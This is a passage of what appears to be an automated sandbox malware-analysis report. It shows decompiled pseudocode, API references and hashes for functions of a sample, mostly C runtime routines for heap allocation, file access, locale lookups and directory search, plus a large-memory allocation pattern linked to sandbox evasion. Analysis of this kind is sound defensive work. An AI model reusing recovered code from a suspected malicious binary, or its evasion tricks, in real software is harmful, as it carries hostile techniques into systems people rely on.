                                                                                              0x01380918
                                                                                              0x0138091b
                                                                                              0x01380927
                                                                                              0x0138092f
                                                                                              0x01380935
                                                                                              0x0138093b
                                                                                              0x01380941
                                                                                              0x01380949
                                                                                              0x01380950
                                                                                              0x01380950
                                                                                              0x01380916

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: 1c0e71dfea67e28950761ee326644b270580263f903ab2175049bad2783cfcb3
                                                                                              • Instruction ID: 74c0d5be17df87564e23c21023caed4da76fa19edbbe3ad591c0a29d122c0718
                                                                                              • Opcode Fuzzy Hash: 1c0e71dfea67e28950761ee326644b270580263f903ab2175049bad2783cfcb3
                                                                                              • Instruction Fuzzy Hash: 13114C71A0420EAFCF09DF59E94499B7BF8EF48304F054059F819AB351D670E915CBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00950838 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 009507DA: GetSystemInfo.KERNELBASE(?), ref: 009507F7
                                                                                              • VirtualAllocExNuma.KERNELBASE(00000000), ref: 0095089D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocInfoNumaSystemVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 449148690-0
                                                                                              • Opcode ID: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                              • Instruction ID: e479651560b99448b8aa925fb5b16f05c520233ffd0d6eb4dcf2dbe66b7f2652
                                                                                              • Opcode Fuzzy Hash: 5104fe00cea5b6b43bfce270a0a2c81ff317ca7eb47637b87448d486c4f4107a
                                                                                              • Instruction Fuzzy Hash: 3AF0FF70D44309BAEB20FBF28C0BB6D76689FC0303F104995BE44A61C3DA795608CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01367808 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 476 1367808-1367813 477 1367815-136781f 476->477 478 1367821-1367827 476->478 477->478 479 1367855-1367860 call 13676c8 477->479 480 1367840-1367851 RtlAllocateHeap 478->480 481 1367829-136782a 478->481 487 1367862-1367864 479->487 483 1367853 480->483 484 136782c-1367833 call 1358b9f 480->484 481->480 483->487 484->479 489 1367835-136783e call 1364f71 484->489 489->479 489->480
                                                                                              C-Code - Quality: 100%
                                                                                              			E01367808(signed int _a4, signed int _a8) {
				void* _t8;
				void* _t12;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x13a0d9c, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01358B9F();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E013676C8())) = 0xc;
							__eflags = 0;
							return 0;
						}
						_t12 = E01364F71(__eflags, _t19);
						__eflags = _t12;
						if(_t12 == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}








                                                                                              0x0136780e
                                                                                              0x01367813
                                                                                              0x01367821
                                                                                              0x01367821
                                                                                              0x01367827
                                                                                              0x01367829
                                                                                              0x01367829
                                                                                              0x01367840
                                                                                              0x01367849
                                                                                              0x01367851
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01367831
                                                                                              0x01367833
                                                                                              0x01367855
                                                                                              0x0136785a
                                                                                              0x01367860
                                                                                              0x00000000
                                                                                              0x01367860
                                                                                              0x01367836
                                                                                              0x0136783c
                                                                                              0x0136783e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136783e
                                                                                              0x00000000
                                                                                              0x01367840
                                                                                              0x01367819
                                                                                              0x0136781f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,?,013638D8,00000001,00000364,?,00000007,000000FF,?,0136F087,00000000,01357A4C,00000000), ref: 01367849
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d610e32af7cd79f25a0e64bf03430e1662bec1a78873deee60610cfa2056dc66
                                                                                              • Instruction ID: d00159d2f01212687747c24ff3e36e1f632876c9d9d00350235c33e0990b9fa3
                                                                                              • Opcode Fuzzy Hash: d610e32af7cd79f25a0e64bf03430e1662bec1a78873deee60610cfa2056dc66
                                                                                              • Instruction Fuzzy Hash: 2BF0E931601225A7FB315A7A9C06B6B3F5D9F417BCF94C065ED14AA59CDB30EC01C2E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013894F0 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 501 13894f0-1389514 CreateFileW
                                                                                              C-Code - Quality: 100%
                                                                                              			E013894F0(WCHAR* _a4, struct _SECURITY_ATTRIBUTES* _a8, long _a16, long _a20, long _a24, signed int _a28, signed int _a32) {
				void* _t10;

				_t10 = CreateFileW(_a4, _a16, _a24, _a8, _a20, _a28 | _a32, 0); // executed
				return _t10;
			}




                                                                                              0x0138950d
                                                                                              0x01389514

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(00000000,00000000,?,01388F55,?,?,00000000,?,01388F55,00000000,0000000C), ref: 0138950D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: f9313ef9ec99abd9ad5b1537f45898aac09a2209f1a70ecb1513aaa3d4c01896
                                                                                              • Instruction ID: 2661a1ea0c80ffe71c9d9b87d59e95f0ae6e61fc14aa4fd75f10a829d0cacbc3
                                                                                              • Opcode Fuzzy Hash: f9313ef9ec99abd9ad5b1537f45898aac09a2209f1a70ecb1513aaa3d4c01896
                                                                                              • Instruction Fuzzy Hash: EED06C3204024DBBDF128E84DC46EDA3BAAFB48714F014100BA1856020C736E961AB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0095073A Relevance: 1.3, APIs: 1, Instructions: 60memoryCOMMON
                                                                                              Download Yara Rule
                                                                                              APIs
                                                                                              • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004,?,?,?,?,?,?,009508B3), ref: 00950777
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263303661.0000000000950000.00000040.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_950000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocVirtual
                                                                                              • String ID:
                                                                                              • API String ID: 4275171209-0
                                                                                              • Opcode ID: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                              • Instruction ID: 010c9b61bcc2d02475e20c41144c088dadffb5a6850da8fda62f5be2a0881616
                                                                                              • Opcode Fuzzy Hash: fefa28e21f4d9309c1ecd3ac6253e750ecc73c234d91debfceddd181198d7f09
                                                                                              • Instruction Fuzzy Hash: 1E111870D00218AFDB10EFA9CC4ABEEBBF4EB44305F208495E915B7291D2755E48CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Function 01369F76 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 96%
                                                                                              			E01369F76(void* __ecx, signed int _a4, intOrPtr _a8) {
				short _v8;
				short _t17;
				signed int _t18;
				signed int _t23;
				signed int _t25;
				signed int _t26;
				signed int _t27;
				void* _t30;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t36;
				intOrPtr* _t37;

				_t23 = _a4;
				if(_t23 == 0) {
					L21:
					if(GetLocaleInfoW( *(_a8 + 8), 0x20001004,  &_v8, 2) != 0) {
						_t17 = _v8;
						if(_t17 == 0) {
							_t17 = GetACP();
						}
						L25:
						return _t17;
					}
					L22:
					_t17 = 0;
					goto L25;
				}
				_t18 = 0;
				if( *_t23 == 0) {
					goto L21;
				}
				_t36 = L"ACP";
				_t25 = _t23;
				while(1) {
					_t30 =  *_t25;
					if(_t30 !=  *_t36) {
						break;
					}
					if(_t30 == 0) {
						L7:
						_t26 = _t18;
						L9:
						if(_t26 == 0) {
							goto L21;
						}
						_t37 = L"OCP";
						_t27 = _t23;
						while(1) {
							_t31 =  *_t27;
							if(_t31 !=  *_t37) {
								break;
							}
							if(_t31 == 0) {
								L17:
								if(_t18 != 0) {
									_t17 = E01382815(_t27, _t23);
									goto L25;
								}
								if(GetLocaleInfoW( *(_a8 + 8), 0x2000000b,  &_v8, 2) == 0) {
									goto L22;
								}
								_t17 = _v8;
								goto L25;
							}
							_t32 =  *((intOrPtr*)(_t27 + 2));
							if(_t32 !=  *((intOrPtr*)(_t37 + 2))) {
								break;
							}
							_t27 = _t27 + 4;
							_t37 = _t37 + 4;
							if(_t32 != 0) {
								continue;
							}
							goto L17;
						}
						asm("sbb eax, eax");
						_t18 = _t18 | 0x00000001;
						goto L17;
					}
					_t33 =  *((intOrPtr*)(_t25 + 2));
					if(_t33 !=  *((intOrPtr*)(_t36 + 2))) {
						break;
					}
					_t25 = _t25 + 4;
					_t36 = _t36 + 4;
					if(_t33 != 0) {
						continue;
					}
					goto L7;
				}
				asm("sbb edx, edx");
				_t26 = _t25 | 0x00000001;
				goto L9;
			}
















                                                                                              0x01369f7c
                                                                                              0x01369f83
                                                                                              0x0136a027
                                                                                              0x0136a040
                                                                                              0x0136a046
                                                                                              0x0136a04b
                                                                                              0x0136a04d
                                                                                              0x0136a04d
                                                                                              0x0136a053
                                                                                              0x0136a056
                                                                                              0x0136a056
                                                                                              0x0136a042
                                                                                              0x0136a042
                                                                                              0x00000000
                                                                                              0x0136a042
                                                                                              0x01369f89
                                                                                              0x01369f8e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369f94
                                                                                              0x01369f99
                                                                                              0x01369f9b
                                                                                              0x01369f9b
                                                                                              0x01369fa1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fa6
                                                                                              0x01369fbd
                                                                                              0x01369fbd
                                                                                              0x01369fc6
                                                                                              0x01369fc8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fca
                                                                                              0x01369fcf
                                                                                              0x01369fd1
                                                                                              0x01369fd1
                                                                                              0x01369fd7
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fdc
                                                                                              0x01369ffa
                                                                                              0x01369ffc
                                                                                              0x0136a01f
                                                                                              0x00000000
                                                                                              0x0136a024
                                                                                              0x0136a017
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0136a019
                                                                                              0x00000000
                                                                                              0x0136a019
                                                                                              0x01369fde
                                                                                              0x01369fe6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fe8
                                                                                              0x01369feb
                                                                                              0x01369ff1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369ff3
                                                                                              0x01369ff5
                                                                                              0x01369ff7
                                                                                              0x00000000
                                                                                              0x01369ff7
                                                                                              0x01369fa8
                                                                                              0x01369fb0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fb2
                                                                                              0x01369fb5
                                                                                              0x01369fbb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01369fbb
                                                                                              0x01369fc1
                                                                                              0x01369fc3
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,01369937,00000002,00000000,?,?,?,01369937,?,00000000), ref: 0136A00F
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,01369937,00000002,00000000,?,?,?,01369937,?,00000000), ref: 0136A038
                                                                                              • GetACP.KERNEL32(?,?,01369937,?,00000000), ref: 0136A04D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP
                                                                                              • API String ID: 2299586839-711371036
                                                                                              • Opcode ID: 47907200050ae9de74a295b8b4f89ae5148493df0e4dcf8447912e86e2b169bc
                                                                                              • Instruction ID: 5b72c56ada692b38ad3f00a1b0503368233cfb32bfc1f2afe656e776876635bd
                                                                                              • Opcode Fuzzy Hash: 47907200050ae9de74a295b8b4f89ae5148493df0e4dcf8447912e86e2b169bc
                                                                                              • Instruction Fuzzy Hash: 79218072700105EEEB358F58C940BA7B7AEEB48A6DB57C424E90AEB14DE732DE45C350
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 013697EE Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 87%
                                                                                              			E013697EE(void* __ecx, void* __edx, signed short _a4, signed short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				signed short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				signed short _t48;
				int _t49;
				void* _t53;
				signed short* _t57;
				signed short _t70;
				intOrPtr _t73;
				void* _t75;
				signed short _t76;
				intOrPtr _t83;
				short* _t86;
				signed short _t89;
				signed short* _t99;
				void* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x139e210; // 0x1911783b
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E0136373A(__ecx, __edx, _t101) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E0136373A(__ecx, __edx, _t101);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x13959a4; // 0x17
					E013699E3(_t89, 0, 0x1395890, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					if(_t48 == 0 ||  *_t48 == _t97) {
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
					} else {
						E01369E66(_t89, _t97,  &_v20);
						_pop(_t89);
					}
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0 ||  *_t70 == _t97) {
						E01369D32(_t89, _t97,  &_v20);
					} else {
						E01369A44(_t89, _t97,  &_v20);
					}
					_pop(_t89);
					if(_v20 != 0) {
						_t100 = 0;
						goto L25;
					} else {
						_t73 =  *0x139588c; // 0x41
						_t75 = E013699E3(_t89, _t97, 0x1395580, _t73 - 1, _v24);
						_t105 = _t105 + 0xc;
						if(_t75 == 0) {
							L20:
							_t100 = 0;
							L21:
							if(_v20 != 0) {
								L25:
								asm("sbb esi, esi");
								_t101 = E01369F76(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
								if(_t101 == 0 || IsValidCodePage(_t101 & 0x0000ffff) == 0 || IsValidLocale(_v16, 1) == 0) {
									goto L22;
								} else {
									_t57 = _v28;
									if(_t57 != 0) {
										 *_t57 = _t101;
									}
									E01362AAF(_v16,  &(_v24[0x128]), 0x55, _t100);
									if(_t86 == 0) {
										L34:
										_t53 = 1;
										L23:
										return E01353E0D(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
									} else {
										_t33 =  &(_t86[0x90]); // 0xd0
										E01362AAF(_v16, _t33, 0x55, _t100);
										if(GetLocaleInfoW(_v16, 0x1001, _t86, 0x40) == 0) {
											goto L22;
										}
										_t36 =  &(_t86[0x40]); // 0x30
										if(GetLocaleInfoW(_v12, 0x1002, _t36, 0x40) == 0) {
											goto L22;
										}
										_t38 =  &(_t86[0x80]); // 0xb0
										E0137033D(_t38, _t101, _t38, 0x10, 0xa);
										goto L34;
									}
								}
							}
							L22:
							_t53 = 0;
							goto L23;
						}
						_t76 =  *_t99;
						_t100 = 0;
						if(_t76 == 0 ||  *_t76 == 0) {
							E01369D32(_t89, _t97,  &_v20);
						} else {
							E01369A44(_t89, _t97,  &_v20);
						}
						_pop(_t89);
						goto L21;
					}
				}
			}

































                                                                                              0x013697f6
                                                                                              0x013697fd
                                                                                              0x01369804
                                                                                              0x01369808
                                                                                              0x0136980c
                                                                                              0x0136981a
                                                                                              0x0136981f
                                                                                              0x01369820
                                                                                              0x01369821
                                                                                              0x01369822
                                                                                              0x0136982a
                                                                                              0x0136982c
                                                                                              0x01369832
                                                                                              0x01369838
                                                                                              0x0136983b
                                                                                              0x0136983d
                                                                                              0x01369840
                                                                                              0x01369844
                                                                                              0x0136984b
                                                                                              0x01369858
                                                                                              0x0136985d
                                                                                              0x01369860
                                                                                              0x01369863
                                                                                              0x01369863
                                                                                              0x01369865
                                                                                              0x01369868
                                                                                              0x0136986c
                                                                                              0x013698dc
                                                                                              0x013698e0
                                                                                              0x013698f3
                                                                                              0x013698fa
                                                                                              0x01369900
                                                                                              0x01369903
                                                                                              0x013698e7
                                                                                              0x013698eb
                                                                                              0x013698f0
                                                                                              0x013698f0
                                                                                              0x00000000
                                                                                              0x01369873
                                                                                              0x01369873
                                                                                              0x01369877
                                                                                              0x0136988d
                                                                                              0x0136987e
                                                                                              0x01369882
                                                                                              0x01369882
                                                                                              0x01369896
                                                                                              0x01369897
                                                                                              0x0136991f
                                                                                              0x00000000
                                                                                              0x0136989d
                                                                                              0x0136989d
                                                                                              0x013698ac
                                                                                              0x013698b1
                                                                                              0x013698b6
                                                                                              0x01369906
                                                                                              0x01369906
                                                                                              0x01369908
                                                                                              0x0136990c
                                                                                              0x01369921
                                                                                              0x0136992d
                                                                                              0x01369937
                                                                                              0x0136993d
                                                                                              0x00000000
                                                                                              0x0136995c
                                                                                              0x0136995c
                                                                                              0x01369961
                                                                                              0x01369963
                                                                                              0x01369963
                                                                                              0x01369974
                                                                                              0x0136997b
                                                                                              0x013699db
                                                                                              0x013699dd
                                                                                              0x01369910
                                                                                              0x0136991e
                                                                                              0x0136997d
                                                                                              0x01369980
                                                                                              0x0136998a
                                                                                              0x013699a2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013699aa
                                                                                              0x013699c1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013699cb
                                                                                              0x013699d3
                                                                                              0x00000000
                                                                                              0x013699d8
                                                                                              0x0136997b
                                                                                              0x0136993d
                                                                                              0x0136990e
                                                                                              0x0136990e
                                                                                              0x00000000
                                                                                              0x0136990e
                                                                                              0x013698b8
                                                                                              0x013698ba
                                                                                              0x013698be
                                                                                              0x013698d4
                                                                                              0x013698c5
                                                                                              0x013698c9
                                                                                              0x013698c9
                                                                                              0x013698d9
                                                                                              0x00000000
                                                                                              0x013698d9
                                                                                              0x01369897

                                                                                              APIs
                                                                                                • Part of subcall function 0136373A: GetLastError.KERNEL32(?,00000008,0136545D), ref: 0136373E
                                                                                                • Part of subcall function 0136373A: SetLastError.KERNEL32(00000000,00000000,00000007,000000FF), ref: 013637E0
                                                                                              • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 013698FA
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 01369943
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 01369952
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 0136999A
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 013699B9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.263651007.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000001.00000002.263645440.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263688808.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.000000000139E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263697384.00000000013A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000001.00000002.263707204.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_1_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                              • String ID:
                                                                                              • API String ID: 415426439-0
                                                                                              • Opcode ID: 0ce291349e71b323ec2da833496c63a430ee69cbf0723523f74bc2f646a257fc
                                                                                              • Instruction ID: 4bc6df6b2278a3c4a42cbc4fad6014f14f6a635b50391f9e7b8b60e424cc5d6f
                                                                                              • Opcode Fuzzy Hash: 0ce291349e71b323ec2da833496c63a430ee69cbf0723523f74bc2f646a257fc
                                                                                              • Instruction Fuzzy Hash: 5D513F72A0020A9EEF21DFA9CC44BBE7BFCAF5470CF058469E615EB148E7719944CB61
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0136D7FE Relevance: 6.2, APIs: 4, Instructions: 205COMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 80%
                                                                                              			E0136D7FE(void* __esi, intOrPtr _a4, intOrPtr* _a8, intOrPtr* _a12) {
				signed int _v8;
				struct _WIN32_FIND_DATAW _v600;
				char _v601;
				void* _v608;
				signed int _v612;
				union _FINDEX_INFO_LEVELS _v616;
				union _FINDEX_INFO_LEVELS _v620;
				signed int _v624;
				union _FINDEX_INFO_LEVELS _v628;
				char _v632;
				signed int _v636;
				union _FINDEX_INFO_LEVELS _v640;
				union _FINDEX_INFO_LEVELS _v644;
				signed int _v648;
				union _FINDEX_INFO_LEVELS _v652;
				char _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				void* __ebx;
				void* __edi;
				signed int _t57;
				char _t59;
				signed char _t60;
				signed int _t66;
				signed int _t72;
				signed int _t78;
				signed int _t81;
				signed int _t82;
				signed int _t84;
				intOrPtr* _t90;
				signed int _t93;
				intOrPtr _t103;
				void* _t107;
				intOrPtr* _t109;
				signed int _t118;
				intOrPtr _t125;
				void* _t126;
				void* _t127;
				void* _t128;
				signed int _t129;
				signed int _t133;
				void* _t134;
				void* _t135;

				_t127 = __esi;
				_t131 = _t133;
				_t134 = _t133 - 0x298;
				_t57 =  *0x139e210; // 0x1911783b
				_v8 = _t57 ^ _t133;
				_t109 = _a8;
				_t123 = _a12;
				_t125 = _a4;
				_v608 = _t123;
				if(_t109 != _t125) {
					while(1) {
						_t103 =  *_t109;
						if(_t103 == 0x2f || _t103 == 0x5c || _t103 == 0x3a) {
							break;
						}
						_t109 = E01386FF0(_t125, _t109);
						if(_t109 != _t125) {
							continue;
						}
						break;
					}
					_t123 = _v608;
				}
				_t59 =  *_t109;
				_v601 = _t59;
				if(_t59 != 0x3a) {
					L11:
					__eflags = _t59 - 0x2f;
					if(__eflags == 0) {
						L14:
						_t60 = 1;
					} else {
						__eflags = _t59 - 0x5c;
						if(__eflags == 0) {
							goto L14;
						} else {
							__eflags = _t59 - 0x3a;
							_t60 = 0;
							if(__eflags == 0) {
								goto L14;
							}
						}
					}
					_v656 = 0;
					_v652 = 0;
					_push(_t127);
					asm("sbb eax, eax");
					_v648 = 0;
					_v644 = 0;
					_v660 =  ~(_t60 & 0x000000ff) & _t109 - _t125 + 0x00000001;
					_v640 = 0;
					_v636 = 0;
					_t66 = E0136D09D(_t109 - _t125 + 1, _t125,  &_v656, E0136CF83(_t123, __eflags));
					_t135 = _t134 + 0xc;
					asm("sbb eax, eax");
					_t128 = FindFirstFileExW( !( ~_t66) & _v648, 0,  &_v600, 0, 0, 0);
					__eflags = _t128 - 0xffffffff;
					if(_t128 != 0xffffffff) {
						_t113 = _v608;
						_t72 =  *((intOrPtr*)(_v608 + 4)) -  *_v608;
						__eflags = _t72;
						_v664 = _t72 >> 2;
						do {
							_v632 = 0;
							_v628 = 0;
							_v624 = 0;
							_v620 = 0;
							_v616 = 0;
							_v612 = 0;
							_t78 = E0136D572( &(_v600.cFileName),  &_v632,  &_v601, E0136CF83(_t123, __eflags));
							_t135 = _t135 + 0x10;
							asm("sbb eax, eax");
							_t81 =  !( ~_t78) & _v624;
							__eflags =  *_t81 - 0x2e;
							if( *_t81 != 0x2e) {
								L24:
								_push(_v608);
								_t82 = E0136D74D(_t113, _t81, _t125, _v660);
								_t135 = _t135 + 0x10;
								_v668 = _t82;
								__eflags = _t82;
								if(_t82 != 0) {
									__eflags = _v612;
									if(_v612 != 0) {
										E01364B6E(_v624);
									}
									FindClose(_t128);
									__eflags = _v636;
									if(_v636 != 0) {
										E01364B6E(_v648);
									}
									_t84 = _v668;
								} else {
									goto L25;
								}
							} else {
								_t113 =  *((intOrPtr*)(_t81 + 1));
								__eflags = _t113;
								if(_t113 == 0) {
									goto L25;
								} else {
									__eflags = _t113 - 0x2e;
									if(_t113 != 0x2e) {
										goto L24;
									} else {
										__eflags =  *(_t81 + 2);
										if( *(_t81 + 2) == 0) {
											goto L25;
										} else {
											goto L24;
										}
									}
								}
							}
